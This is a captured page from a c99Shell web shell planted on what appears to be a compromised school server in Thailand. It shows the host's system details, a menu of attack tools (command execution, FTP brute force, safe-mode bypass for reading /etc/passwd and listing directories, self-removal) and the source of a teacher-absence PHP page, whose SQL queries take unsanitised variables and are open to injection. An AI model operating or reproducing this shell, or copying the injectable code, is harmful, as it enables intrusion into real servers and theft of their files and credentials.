!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/teacher_aj_viratt/Adsent/   drwxr-xr-x
Free 52.41 GB of 127.8 GB (41.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Edit_His_Absent.php (8.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("../../include/FunctionDB.php");
include(
"../../include/Function.php");
 
session_start();
 if (
session_is_registered("valid_user")&&session_is_registered("password"))
 {
 
$Username $valid_user;
 
$Password $password;
ConnectDB();
$sql "Select * From personal_tb Where Teacher_code='$Teacher_code'";
$result mysql_query($sql) or die(" Error").mysql_error();
$rss mysql_fetch_array($result);
$sql1 "Select * from history_absent_tb Where code='$code'";
$result1 mysql_query($sql1);
$rs mysql_fetch_array($result1);
?>
<html>
<head>
<title>edit data</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../../css/style1.css" rel="stylesheet" type="text/css">
</head>

<body>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
  <tr>
    <td colspan="3" bgcolor="#0066CC"" onMouseOut="this.style.backgroundColor='#D1E9D1'"this.style.backgroundColor='#FFFFFF'><img src="../../Image/Ponallogo.jpg" width="550" height="71"></td>
  </tr>
  <tr> 
    <td width="20%" background="../../Image/barm.jpg"this.style.backgroundColor='#FFFFFF'" onMouseOut="this.style.backgroundColor='#D1E9D1'"" class="table"> 
      <div align="center"><strong><font size="2" face="Tahoma"><a href="../menu_teacher.php" class="d" >¡ÅѺ˹éÒËÅÑ¡</a></font></strong></div></td>
    <td width="20%" background="../../Image/barm.jpg" class="table"> 
      <div align="center"><strong><font size="2" face="Tahoma"><a href="EditAbsentList.php?Teacher_code=<? echo $rss[Teacher_code]?>" class="d" >ź 
        ËÃ×Í á¡éä¢</a></font></strong></div></td>
    <td width="20%" background="../../Image/barm.jpg" class="table"> 
      <div align="center"><strong><font size="2" face="Tahoma"><a href="../../logout.php" class="d" >Logout</a></font></strong></div></td>
  </tr>
</table>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr> 
    <td>&nbsp;</td>
  </tr>
</table>
<table width="95%" border="0" align="center" cellpadding="0" cellspacing="2" style="background-color:#eeeeee; border:1px solid gray"size="12">
  <form action="Edit.php" method="post">
    <tr bgcolor="#FDD88A"> 
      <td colspan="3"> <div align="center"><font color="#000000" size="4" face="Tahoma"><strong><font color="#CC0000">á¡éä¢</font> 
          ¢éÍÁÙÅ»ÃÐÇѵԡÒÃÅÒ</strong></font></div></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td> <div align="center"><font color="#003366" size="2" face="Tahoma">ª×èÍ 
          - ¹ÒÁÊ¡ØÅ</font></div></td>
      <td>&nbsp;</td>
      <td><font color="#003366" size="2" face="Tahoma">&nbsp;&nbsp;<? echo $rss[First_name]?> 
        <? echo $rss[Teacher_name]?>&nbsp;<? echo $rss[Teacher_lastname]?></font></td>
    </tr>
    <tr bgcolor="#eeeeee"> 
      <td width="18%" bordercolor="#CCCCCC"> <div align="center"><font color="#003366" size="2" face="Tahoma">àÃÔèÁÅÒÇѹ·Õè</font></div></td>
      <td width="2%" bordercolor="#FFFFCC"><font size="2" face="Tahoma">&nbsp;</font></td>
      <td width="80%" bordercolor="#FFFFCC" bgcolor="#eeeeee"> <font size="2" face="Tahoma">&nbsp;</font><font color="#000000" size="2" face="Tahoma"> 
        Çѹ·Õè 
        <select name="mDate" id="mDate" class="select" >
          <?php
           $Date_start 
$rs[Date_start];
           
$yearthai explode("-",$Date_start);
           
$mDate =   intval($yearthai[2]);
           
$mMonth =  intval($yearthai[1]);
           
$mYear =   intval($yearthai[0]);
            for(
$i=0;$i<=31;$i++)
             {  
            if( 
$i == 0)
               echo
"\n\t<option value=\"$mDate\" selected>$mDate</option>\n ";
             else
               echo
"\n\t<option value=\"$i\">$i</option>\n ";
              }
                 
//    getDay1to31();
           
?>
        </select>
        à´×͹ »Õ ¾.È. 
        <select name="mMonth" id="select2" class="select" >
          <?php
          $Date_start 
$rs[Date_start];
           
$yearthai explode("-",$Date_start);
           
$mDate=   intval($yearthai[2]);
           
$Month =  intval($yearthai[1]);
           
$mYear =   intval($yearthai[0]);     
           
$mMonth $Month;
          
$CMonth TxtThaiMonth($Month);
           for(
$i=-1;$i<=11;$i++)
              {
             
$a $i+1;
                if( 
$a == 0)
                  echo
"\n\t<option value=\"$mMonth\" selected>$CMonth</option>\n ";
             else
                  echo
"\n\t<option value=\"$a\">$ThaiMonth[$i]</option>\n ";
              }
                 
// getThaiMonth();
          
?>
        </select>
        <input name="mYear" type="text" class="input" id="mYear" value="<? echo $mYear ?>" size="10">
        </font><font size="2" face="Tahoma">&nbsp;<font color="#003366">¶Ö§ </font></font><font color="#000000" size="2" face="Tahoma">&nbsp;&nbsp; 
        Çѹ·Õè 
        <select name="mDate2" id="mDate2" class="select" >
          <?php
           $Date_finish 
$rs[Date_finish];
           
$yearthai explode("-",$Date_finish);
           
$mDate =   intval($yearthai[2]);
           
$mMonth =  intval($yearthai[1]);
           
$mYear =   intval($yearthai[0]);
            for(
$i=0;$i<=31;$i++)
             {  
            if( 
$i == 0)
               echo
"\n\t<option value=\"$mDate\" selected>$mDate</option>\n ";
             else
               echo
"\n\t<option value=\"$i\">$i</option>\n ";
              }
                 
//    getDay1to31();
           
?>
        </select>
        à´×͹ 
        <select name="mMonth2" id="select3" class="select" >
          <?php
          $Date_finish 
$rs[Date_finish];
           
$yearthai explode("-",$Date_finish);
           
$mDate=   intval($yearthai[2]);
           
$Month =  intval($yearthai[1]);
           
$mYear =   intval($yearthai[0]);     
           
$mMonth $Month;
          
$CMonth TxtThaiMonth($Month);
           for(
$i=-1;$i<=11;$i++)
              {
             
$a $i+1;
                if( 
$a == 0)
                  echo
"\n\t<option value=\"$mMonth\" selected>$CMonth</option>\n ";
             else
                  echo
"\n\t<option value=\"$a\">$ThaiMonth[$i]</option>\n ";
              }
                 
// getThaiMonth();
          
?>
        </select>
        »Õ ¾.È. 
        <input name="mYear2" type="text" class="input" id="mYear2" value="<? echo $mYear ?>" size="10">
        </font></td>
    </tr>
    
    <tr bgcolor="#eeeeee">
      <td bordercolor="#CCCCCC"><div align="center"><font color="#003366" size="2" face="Tahoma">»ÃÐàÀ·¡ÒÃÅÒ</font></div></td>
      <td bordercolor="#FFFFCC">&nbsp;</td>
      <td bordercolor="#FFFFCC"><font size="2" face="Tahoma"><strong><font color="#003366" size="2" face="Tahoma">
        <select name="Absent_code" id="Absent_code" class="input1">
          <?php
           $Absent_code 
$rs["Absent_code"];
            
$strSQL3 "SELECT * FROM  history_absent01_tb Where Absent_code='$Absent_code' ";
           
$result3 mysql_query($strSQL3);
                 while( 
$rs3 mysql_fetch_array($result3))     
                     {
                 echo
"<option value=\"$rs3[Absent_code]\" ><b>$rs3[Absent_type]</b></option>\n";
                }
                
CloseDB();  
                
          
?>
        </select>
      </font></strong></font></td>
    </tr>
    <tr bgcolor="#eeeeee"> 
      <td bordercolor="#CCCCCC"><div align="center"><font color="#003366" size="2" face="Tahoma">¨Ó¹Ç¹ÇѹÅÒ</font></div></td>
      <td bordercolor="#FFFFCC">&nbsp;</td>
      <td bordercolor="#FFFFCC"><input name="Absent_times" type="text" id="Absent_times" value="<? echo $rs[Absent_times]?>"></td>
    </tr>
    <tr bgcolor="#eeeeee"> 
      <td bordercolor="#CCCCCC"><div align="center"><font color="#003366" size="2" face="Tahoma">¡ÒùѺ</font></div></td>
      <td bordercolor="#FFFFCC"><font size="2" face="Tahoma">&nbsp;</font></td>
      <td bordercolor="#FFFFCC"><font size="2" face="Tahoma"> 
        <input type="radio" name="Unit_count"  <?php if (!(strcmp("$rs[Unit_count]","¹Ñº¤ÃÑé§"))){echo "checked";} ?> value="¹Ñº¤ÃÑé§">
        ¹Ñº¤ÃÑ駠
        <input type="radio" name="Unit_count" <?php if (!(strcmp("$rs[Unit_count]","äÁè¹Ñº¤ÃÑé§"))){echo "checked";} ?>  value="äÁè¹Ñº¤ÃÑé§">
        äÁè¹Ñº¤ÃÑé§</font></td>
    </tr>
    <tr bgcolor="#FDD88A"> 
      <td colspan="3"> <div align="center"> 
          <input type="hidden" name="Teacher_code" value="<? echo $rss[Teacher_code]?>">
          <input type="hidden" name="code" value="<? echo $rs[code]?>">
          <input type="submit" name="Submit" value="  ºÑ¹·Ö¡  " class="button">
        </div></td>
    </tr>
  </form>
</table>
</body>
</html>
<?php 
    
}
else
{
       echo
"<meta http-equiv=\"refresh\" content=\"3;URL=../../login.php\">\n";
       echo
"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0125 ]--